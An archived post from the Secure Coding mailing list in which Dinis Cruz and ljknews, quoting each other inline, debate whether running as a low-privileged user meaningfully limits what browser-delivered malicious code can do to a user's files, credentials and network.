Comment inline, ljknews wrote: Sure, but if the main assets exist within that user's space, then the risk is similar.At 11:39 AM +0000 3/25/06, Dinis Cruz wrote:3) Since my assets as a user exist in user land, isn't the risk profile of malicious unmanaged code (deployed via IE/Firefox) roughly the same if I am running as a 'low privileged' user or as administrator? (at theIf the administrator's assets are compromised, all users of the system will have their assets compromised. Look at your own computer, even if you use a non-admin account (like I am doing at the moment in my PowerBook G4), if a malicious attacker is after your assets (email, VPNs, documents, Credit Card details, access to your online banking accounts, attack other computers on your local network, etc...) then he can do all that from user-land (there is no need for admin privileges) Ok, but this is impossible today (at least in Windows). In a normal user session, you will have credentials (or equivalent) in multiple user-land processes. From login accounts used in your Browser to valid Kerberous tickets (or more to the point, valid windows security handles (i.e. tokens) which are as good as a stored credentials).end of the day, in both cases the malicious code will still be able to: access my files, access all websites that I have stored credentials in my browser (cookies or username / passwords pairs), access my VPNs,Certainly users should not store credentials in software on a computer. The bottom line is, if your browser can do it, so can malicious code executed via your browser. Who said that? I might not be able to put it in under the 'Program files' folder, add files to the windows directory or write to some sections of the registry. But since you can run executables, you can perform all sorts of malicious actions.attack other computers on the local network, install key loggers,If one is not the administrator, there should be no way to install software. If there is, the operating system is underprotected. A good example are .Net applications which can be executed with no installation. This is not a design flaw with TCP/IP, the problem here is that the OS and the run-time-Sandbox (if there is one) are allowing this to occur.establish two way communication with a Internet based boot net, etc ...At least one aspect of that is a design defect in TCP/IP, allowing unprivileged users to create a port to receive inbound connections. Other networking protocols avoid that flaw. Remember that if I can talk HTTP with an external computer (located somewhere in the Internet), then I can use it to establish a two communication channel. Can you really defend that all applications that are executed in our computers (from winzip upwards) should be able to connect to the internal, download code and execute it with the privileges of the logged in user? Because that is what they can do today (if that computer is connected to the Internet :) Dinis Cruz Owasp .Net Project www.owasp.net |
_______________________________________________ Secure Coding mailing list (SC-L) SC-L@securecoding.org List information, subscriptions, etc - http://krvw.com/mailman/listinfo/sc-l List charter available at - http://www.securecoding.org/list/charter.php